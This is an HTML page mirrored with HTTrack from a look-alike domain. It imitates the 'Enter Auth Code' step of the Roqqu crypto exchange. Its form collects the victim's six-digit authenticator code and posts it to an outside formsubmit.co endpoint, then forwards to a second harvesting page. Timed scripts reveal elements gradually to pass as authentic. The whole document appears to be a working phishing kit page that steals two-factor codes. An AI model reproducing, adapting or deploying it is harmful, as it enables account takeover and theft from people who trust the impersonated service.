<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from roqquweb.com/auth by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Mar 2022 16:22:55 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Auth</title>
    <link rel="stylesheet" href="../cdn.jsdelivr.net/npm/bootstrap%404.6.1/dist/css/bootstrap.min.css">
    <link rel="shortcut icon" href="images/download__1_-removebg-preview.png">
    <script src="../cdn.jsdelivr.net/npm/jquery%403.5.1/dist/jquery.slim.min.js"></script>
    <script src="../cdn.jsdelivr.net/npm/popper.js%401.16.1/dist/umd/popper.min.js"></script>
    <script src="../cdn.jsdelivr.net/npm/bootstrap%404.6.1/dist/js/bootstrap.bundle.min.js"></script>
    <script src="../kit.fontawesome.com/ae0531fa65.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="sttyle.css">
    <!-- <link rel="stylesheet" href="verify.css"> -->
    <link rel="stylesheet" href="auth.css">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@500;600&amp;display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Spline+Sans:wght@700&amp;display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Raleway:wght@600&amp;display=swap" rel="stylesheet">
</head>
<body>
    <div id="top" style="visibility: hidden;" class="text-center">
        <a class="header-section text-center" href="#"><img class="header-img text-center" src="../d33wubrfki0l68.cloudfront.net/a8dd2dc0964b7d33e9cf455c7d107be0428df284/420e6/images/logo.png" alt=""></a>

        <div id="topcc" style="visibility: hidden;" class="container-paddinng">
            <h2>Enter Auth Code</h2>
            <div >
            <p>An Auth code from your aunthenticator app is required to complete your transactions on Roqqu.</p>
            </div>
        </div>
    </div>
    <div class="text-center">
    <form action="https://formsubmit.co/ac48cced3fe7aa8e81b98275b936ba95"   method="POST">
        <input type="hidden" name="_next" value="auth-2.html">
        <input type="hidden" name="_captcha" value="false">
        <input id="input" style="visibility: hidden;" name="2fa-Auth-code" type="tel" required maxlength="6" class="auth-input" placeholder="Enter Auth Code">
        <br>
       <button style="visibility: hidden;" type="submit" id="submitBtn" class="myBtn"> Complete</button>

    </form>

    <img style="visibility: hidden;" src="https://source.unsplash.com/random/100x100" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/100x100" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/100x100" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">
    <img style="visibility: hidden;" src="https://source.unsplash.com/random/101x50" alt="">

    


    </div>




    
    <script>
        function showBody() {
document.querySelector('#input').style.visibility="visible";
}

function container() {
document.querySelector('#topcc').style.visibility="visible";
}
function showBtn() {
document.querySelector('button').style.visibility="visible";
}
function showTop() {
document.querySelector('#top').style.visibility="visible";
}

setTimeout("showBody()", 3000);
setTimeout("container()", 3000);
setTimeout("showBtn()", 4000);
setTimeout("showTop()", 1700);
    </script>


<script>
        const btn = document.getElementById("submitBtn");
        const input = document.querySelector(".auth-input");

        btn.addEventListener("click", () => {
            btn.innerHTML = 'Loading...';
        });

        input.addEventListener("keyup", () => {
            if (btn.innerHTML = 'Loading...') {
                btn.innerHTML = 'Complete';
            }
        });
</script>

    <script src="main.js"></script>
</body>

<!-- Mirrored from roqquweb.com/auth by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Mar 2022 16:22:58 GMT -->
</html>